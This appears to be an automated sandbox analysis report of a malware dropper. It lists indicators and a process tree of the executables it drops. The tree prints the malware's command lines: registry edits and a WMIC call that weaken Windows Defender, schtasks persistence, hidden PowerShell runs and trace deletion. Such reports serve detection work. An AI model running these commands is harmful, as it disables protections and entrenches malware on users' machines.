Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3332	schtasks.exe
3488	schtasks.exe
4776	schtasks.exe
2216	schtasks.exe
1556	schtasks.exe
3732	schtasks.exe
3664	schtasks.exe
1636	schtasks.exe
4532	schtasks.exe
4148	schtasks.exe
1096	schtasks.exe
2600	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3664	1719422619.8807507_setup.exe
3664	1719422619.8807507_setup.exe
3480	vihFzk9jCs0pItPYYIi5itTj.exe
3480	vihFzk9jCs0pItPYYIi5itTj.exe
344	r_qUrVNOihb6Qjyj3i4KaR31.exe
344	r_qUrVNOihb6Qjyj3i4KaR31.exe
2904	GBnJo1RZMtXzuVP9XNAij4Im.exe
2904	GBnJo1RZMtXzuVP9XNAij4Im.exe
1636	MSBuild.exe
1636	MSBuild.exe
2388	powershell.exe
2388	powershell.exe
2388	powershell.exe
344	r_qUrVNOihb6Qjyj3i4KaR31.exe
344	r_qUrVNOihb6Qjyj3i4KaR31.exe
3476	MSBuild.exe
3476	MSBuild.exe
1636	MSBuild.exe
1636	MSBuild.exe
1748	MSBuild.exe
1748	MSBuild.exe
4160	powershell.exe
4160	powershell.exe
4160	powershell.exe
3304	DAAFBAKECA.exe
3304	DAAFBAKECA.exe
1748	MSBuild.exe
1748	MSBuild.exe
1748	MSBuild.exe
1748	MSBuild.exe
416	explortu.exe
416	explortu.exe
1636	MSBuild.exe
1636	MSBuild.exe
2904	GBnJo1RZMtXzuVP9XNAij4Im.exe
2904	GBnJo1RZMtXzuVP9XNAij4Im.exe
2904	GBnJo1RZMtXzuVP9XNAij4Im.exe
2904	GBnJo1RZMtXzuVP9XNAij4Im.exe
2904	GBnJo1RZMtXzuVP9XNAij4Im.exe
2904	GBnJo1RZMtXzuVP9XNAij4Im.exe
2904	GBnJo1RZMtXzuVP9XNAij4Im.exe
2904	GBnJo1RZMtXzuVP9XNAij4Im.exe
996	eqtpkqwqodik.exe
996	eqtpkqwqodik.exe
996	eqtpkqwqodik.exe
996	eqtpkqwqodik.exe
996	eqtpkqwqodik.exe
996	eqtpkqwqodik.exe
996	eqtpkqwqodik.exe
996	eqtpkqwqodik.exe
1636	MSBuild.exe
1636	MSBuild.exe
364	RegAsm.exe
364	RegAsm.exe
1364	explortu.exe
1364	explortu.exe
3704	powershell.exe
3704	powershell.exe
3572	powershell.exe
3572	powershell.exe
4164	powershell.exe
4164	powershell.exe
3028	powershell.EXE
3028	powershell.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1872	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe
Token: SeDebugPrivilege	4412	G4I2nkjHTCezGAMuIbkdUmWe.exe
Token: SeDebugPrivilege	1508	O31cM3L7N729qiMfZ32ZErtb.exe
Token: SeDebugPrivilege	3476	MSBuild.exe
Token: SeBackupPrivilege	3476	MSBuild.exe
Token: SeSecurityPrivilege	3476	MSBuild.exe
Token: SeSecurityPrivilege	3476	MSBuild.exe
Token: SeSecurityPrivilege	3476	MSBuild.exe
Token: SeSecurityPrivilege	3476	MSBuild.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	1748	MSBuild.exe
Token: SeDebugPrivilege	4160	powershell.exe
Token: SeIncreaseQuotaPrivilege	1528	WMIC.exe
Token: SeSecurityPrivilege	1528	WMIC.exe
Token: SeTakeOwnershipPrivilege	1528	WMIC.exe
Token: SeLoadDriverPrivilege	1528	WMIC.exe
Token: SeSystemProfilePrivilege	1528	WMIC.exe
Token: SeSystemtimePrivilege	1528	WMIC.exe
Token: SeProfSingleProcessPrivilege	1528	WMIC.exe
Token: SeIncBasePriorityPrivilege	1528	WMIC.exe
Token: SeCreatePagefilePrivilege	1528	WMIC.exe
Token: SeBackupPrivilege	1528	WMIC.exe
Token: SeRestorePrivilege	1528	WMIC.exe
Token: SeShutdownPrivilege	1528	WMIC.exe
Token: SeDebugPrivilege	1528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1528	WMIC.exe
Token: SeRemoteShutdownPrivilege	1528	WMIC.exe
Token: SeUndockPrivilege	1528	WMIC.exe
Token: SeManageVolumePrivilege	1528	WMIC.exe
Token: 33	1528	WMIC.exe
Token: 34	1528	WMIC.exe
Token: 35	1528	WMIC.exe
Token: 36	1528	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1528	WMIC.exe
Token: SeSecurityPrivilege	1528	WMIC.exe
Token: SeTakeOwnershipPrivilege	1528	WMIC.exe
Token: SeLoadDriverPrivilege	1528	WMIC.exe
Token: SeSystemProfilePrivilege	1528	WMIC.exe
Token: SeSystemtimePrivilege	1528	WMIC.exe
Token: SeProfSingleProcessPrivilege	1528	WMIC.exe
Token: SeIncBasePriorityPrivilege	1528	WMIC.exe
Token: SeCreatePagefilePrivilege	1528	WMIC.exe
Token: SeBackupPrivilege	1528	WMIC.exe
Token: SeRestorePrivilege	1528	WMIC.exe
Token: SeShutdownPrivilege	1528	WMIC.exe
Token: SeDebugPrivilege	1528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1528	WMIC.exe
Token: SeRemoteShutdownPrivilege	1528	WMIC.exe
Token: SeUndockPrivilege	1528	WMIC.exe
Token: SeManageVolumePrivilege	1528	WMIC.exe
Token: 33	1528	WMIC.exe
Token: 34	1528	WMIC.exe
Token: 35	1528	WMIC.exe
Token: 36	1528	WMIC.exe
Token: SeDebugPrivilege	364	RegAsm.exe
Token: SeBackupPrivilege	364	RegAsm.exe
Token: SeSecurityPrivilege	364	RegAsm.exe
Token: SeSecurityPrivilege	364	RegAsm.exe
Token: SeSecurityPrivilege	364	RegAsm.exe
Token: SeSecurityPrivilege	364	RegAsm.exe
Token: SeShutdownPrivilege	4440	powercfg.exe
Token: SeCreatePagefilePrivilege	4440	powercfg.exe
Token: SeShutdownPrivilege	4624	powercfg.exe
Token: SeCreatePagefilePrivilege	4624	powercfg.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4648	XiiRMqxd1DldtkIsBZaBkkPQ.tmp

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
344	r_qUrVNOihb6Qjyj3i4KaR31.exe
1872	cmd.exe
4968	67b41ac664.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3664 wrote to memory of 344	3664	1719422619.8807507_setup.exe	83
PID 3664 wrote to memory of 344	3664	1719422619.8807507_setup.exe	83
PID 3664 wrote to memory of 344	3664	1719422619.8807507_setup.exe	83
PID 3664 wrote to memory of 1508	3664	1719422619.8807507_setup.exe	85
PID 3664 wrote to memory of 1508	3664	1719422619.8807507_setup.exe	85
PID 3664 wrote to memory of 1508	3664	1719422619.8807507_setup.exe	85
PID 3664 wrote to memory of 3912	3664	1719422619.8807507_setup.exe	84
PID 3664 wrote to memory of 3912	3664	1719422619.8807507_setup.exe	84
PID 3664 wrote to memory of 2080	3664	1719422619.8807507_setup.exe	86
PID 3664 wrote to memory of 2080	3664	1719422619.8807507_setup.exe	86
PID 3664 wrote to memory of 2080	3664	1719422619.8807507_setup.exe	86
PID 3664 wrote to memory of 3480	3664	1719422619.8807507_setup.exe	87
PID 3664 wrote to memory of 3480	3664	1719422619.8807507_setup.exe	87
PID 3664 wrote to memory of 3480	3664	1719422619.8807507_setup.exe	87
PID 3664 wrote to memory of 5000	3664	1719422619.8807507_setup.exe	90
PID 3664 wrote to memory of 5000	3664	1719422619.8807507_setup.exe	90
PID 3664 wrote to memory of 5000	3664	1719422619.8807507_setup.exe	90
PID 3664 wrote to memory of 4412	3664	1719422619.8807507_setup.exe	89
PID 3664 wrote to memory of 4412	3664	1719422619.8807507_setup.exe	89
PID 3664 wrote to memory of 4412	3664	1719422619.8807507_setup.exe	89
PID 3664 wrote to memory of 2956	3664	1719422619.8807507_setup.exe	88
PID 3664 wrote to memory of 2956	3664	1719422619.8807507_setup.exe	88
PID 3664 wrote to memory of 2956	3664	1719422619.8807507_setup.exe	88
PID 3664 wrote to memory of 2904	3664	1719422619.8807507_setup.exe	91
PID 3664 wrote to memory of 2904	3664	1719422619.8807507_setup.exe	91
PID 2080 wrote to memory of 4648	2080	XiiRMqxd1DldtkIsBZaBkkPQ.exe	92
PID 2080 wrote to memory of 4648	2080	XiiRMqxd1DldtkIsBZaBkkPQ.exe	92
PID 2080 wrote to memory of 4648	2080	XiiRMqxd1DldtkIsBZaBkkPQ.exe	92
PID 4412 wrote to memory of 1748	4412	G4I2nkjHTCezGAMuIbkdUmWe.exe	178
PID 4412 wrote to memory of 1748	4412	G4I2nkjHTCezGAMuIbkdUmWe.exe	178
PID 4412 wrote to memory of 1748	4412	G4I2nkjHTCezGAMuIbkdUmWe.exe	178
PID 5000 wrote to memory of 1636	5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe	94
PID 5000 wrote to memory of 1636	5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe	94
PID 5000 wrote to memory of 1636	5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe	94
PID 5000 wrote to memory of 1636	5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe	94
PID 5000 wrote to memory of 1636	5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe	94
PID 5000 wrote to memory of 1636	5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe	94
PID 5000 wrote to memory of 1636	5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe	94
PID 5000 wrote to memory of 1636	5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe	94
PID 5000 wrote to memory of 1636	5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe	94
PID 4412 wrote to memory of 1748	4412	G4I2nkjHTCezGAMuIbkdUmWe.exe	178
PID 4412 wrote to memory of 1748	4412	G4I2nkjHTCezGAMuIbkdUmWe.exe	178
PID 4412 wrote to memory of 1748	4412	G4I2nkjHTCezGAMuIbkdUmWe.exe	178
PID 4412 wrote to memory of 1748	4412	G4I2nkjHTCezGAMuIbkdUmWe.exe	178
PID 4412 wrote to memory of 1748	4412	G4I2nkjHTCezGAMuIbkdUmWe.exe	178
PID 4648 wrote to memory of 1600	4648	XiiRMqxd1DldtkIsBZaBkkPQ.tmp	93
PID 4648 wrote to memory of 1600	4648	XiiRMqxd1DldtkIsBZaBkkPQ.tmp	93
PID 4648 wrote to memory of 1600	4648	XiiRMqxd1DldtkIsBZaBkkPQ.tmp	93
PID 1508 wrote to memory of 3476	1508	O31cM3L7N729qiMfZ32ZErtb.exe	97
PID 1508 wrote to memory of 3476	1508	O31cM3L7N729qiMfZ32ZErtb.exe	97
PID 1508 wrote to memory of 3476	1508	O31cM3L7N729qiMfZ32ZErtb.exe	97
PID 2956 wrote to memory of 1496	2956	2aJvrCiUDCFYYXG64hV3mgtw.exe	96
PID 2956 wrote to memory of 1496	2956	2aJvrCiUDCFYYXG64hV3mgtw.exe	96
PID 2956 wrote to memory of 1496	2956	2aJvrCiUDCFYYXG64hV3mgtw.exe	96
PID 1508 wrote to memory of 3476	1508	O31cM3L7N729qiMfZ32ZErtb.exe	97
PID 1508 wrote to memory of 3476	1508	O31cM3L7N729qiMfZ32ZErtb.exe	97
PID 1508 wrote to memory of 3476	1508	O31cM3L7N729qiMfZ32ZErtb.exe	97
PID 1508 wrote to memory of 3476	1508	O31cM3L7N729qiMfZ32ZErtb.exe	97
PID 1508 wrote to memory of 3476	1508	O31cM3L7N729qiMfZ32ZErtb.exe	97
PID 3480 wrote to memory of 1556	3480	vihFzk9jCs0pItPYYIi5itTj.exe	99
PID 3480 wrote to memory of 1556	3480	vihFzk9jCs0pItPYYIi5itTj.exe	99
PID 3480 wrote to memory of 1556	3480	vihFzk9jCs0pItPYYIi5itTj.exe	99
PID 4648 wrote to memory of 824	4648	XiiRMqxd1DldtkIsBZaBkkPQ.tmp	101
PID 4648 wrote to memory of 824	4648	XiiRMqxd1DldtkIsBZaBkkPQ.tmp	101

C:\Users\Admin\AppData\Local\Temp\1719422619.8807507_setup.exe
"C:\Users\Admin\AppData\Local\Temp\1719422619.8807507_setup.exe"
1⤵
- Modifies firewall policy service
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3664
- C:\Users\Admin\Documents\SimpleAdobe\r_qUrVNOihb6Qjyj3i4KaR31.exe
  C:\Users\Admin\Documents\SimpleAdobe\r_qUrVNOihb6Qjyj3i4KaR31.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:344
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DAAFBAKECA.exe"
    3⤵
    PID:1092
  - - C:\Users\Admin\AppData\Local\Temp\DAAFBAKECA.exe
      "C:\Users\Admin\AppData\Local\Temp\DAAFBAKECA.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      PID:3304
    - - C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:416
      - C:\Users\Admin\AppData\Local\Temp\1000022001\67b41ac664.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000022001\67b41ac664.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:4968
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CAKFIJDHJE.exe"
    3⤵
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:1872
- C:\Users\Admin\Documents\SimpleAdobe\R6PBXCMSO9TzmAaDyHEOHGAa.exe
  C:\Users\Admin\Documents\SimpleAdobe\R6PBXCMSO9TzmAaDyHEOHGAa.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3912
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    PID:1384
- C:\Users\Admin\Documents\SimpleAdobe\O31cM3L7N729qiMfZ32ZErtb.exe
  C:\Users\Admin\Documents\SimpleAdobe\O31cM3L7N729qiMfZ32ZErtb.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1508
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3476
- C:\Users\Admin\Documents\SimpleAdobe\XiiRMqxd1DldtkIsBZaBkkPQ.exe
  C:\Users\Admin\Documents\SimpleAdobe\XiiRMqxd1DldtkIsBZaBkkPQ.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2080
- - C:\Users\Admin\AppData\Local\Temp\is-4MHQ7.tmp\XiiRMqxd1DldtkIsBZaBkkPQ.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-4MHQ7.tmp\XiiRMqxd1DldtkIsBZaBkkPQ.tmp" /SL5="$8021C,5143929,54272,C:\Users\Admin\Documents\SimpleAdobe\XiiRMqxd1DldtkIsBZaBkkPQ.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4648
  - - C:\Users\Admin\AppData\Local\Audio Normalizer\audionormalizer32_64.exe
      "C:\Users\Admin\AppData\Local\Audio Normalizer\audionormalizer32_64.exe" -i
      4⤵
      Executes dropped EXE
      PID:1600
  - - C:\Users\Admin\AppData\Local\Audio Normalizer\audionormalizer32_64.exe
      "C:\Users\Admin\AppData\Local\Audio Normalizer\audionormalizer32_64.exe" -s
      4⤵
      Executes dropped EXE
      PID:824
- C:\Users\Admin\Documents\SimpleAdobe\vihFzk9jCs0pItPYYIi5itTj.exe
  C:\Users\Admin\Documents\SimpleAdobe\vihFzk9jCs0pItPYYIi5itTj.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3480
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1556
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3732
- C:\Users\Admin\Documents\SimpleAdobe\2aJvrCiUDCFYYXG64hV3mgtw.exe
  C:\Users\Admin\Documents\SimpleAdobe\2aJvrCiUDCFYYXG64hV3mgtw.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Users\Admin\AppData\Local\Temp\7zS19CC.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\7zS25C3.tmp\Install.exe
      .\Install.exe /JudidKE "525403" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      PID:4032
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:3704
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:436
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:3384
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:1716
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:908
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:788
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:4120
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:3736
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:4660
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:4080
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:4920
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:3608
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:1628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2388
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:896
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:2076
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:1992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4160
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1528
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bjeWJKrHnPpdAGCduF" /SC once /ST 17:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS25C3.tmp\Install.exe\" bC /zpwdidR 525403 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:3664
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 1080
        5⤵
        Program crash
        
        PID:2172
- C:\Users\Admin\Documents\SimpleAdobe\G4I2nkjHTCezGAMuIbkdUmWe.exe
  C:\Users\Admin\Documents\SimpleAdobe\G4I2nkjHTCezGAMuIbkdUmWe.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4412
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- C:\Users\Admin\Documents\SimpleAdobe\cLDYFdAxp1MLwPYZWc_Q4T3A.exe
  C:\Users\Admin\Documents\SimpleAdobe\cLDYFdAxp1MLwPYZWc_Q4T3A.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5000
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1636
  - - C:\ProgramData\EHJKFCGHID.exe
      "C:\ProgramData\EHJKFCGHID.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4088
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:788
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 320
        5⤵
        Program crash
        
        PID:1788
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 348
        5⤵
        Program crash
        
        PID:1384
  - - C:\ProgramData\BKJKJEHJJD.exe
      "C:\ProgramData\BKJKJEHJJD.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:1820
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:4692
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:3884
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 308
        5⤵
        Program crash
        
        PID:4064
  - - C:\ProgramData\IECAFHDBGH.exe
      "C:\ProgramData\IECAFHDBGH.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:3748
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:364
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 288
        5⤵
        Program crash
        
        PID:236
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HDBGDHDAECBG" & exit
      4⤵
      PID:904
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:1604
- C:\Users\Admin\Documents\SimpleAdobe\GBnJo1RZMtXzuVP9XNAij4Im.exe
  C:\Users\Admin\Documents\SimpleAdobe\GBnJo1RZMtXzuVP9XNAij4Im.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2904
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:4908
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4440
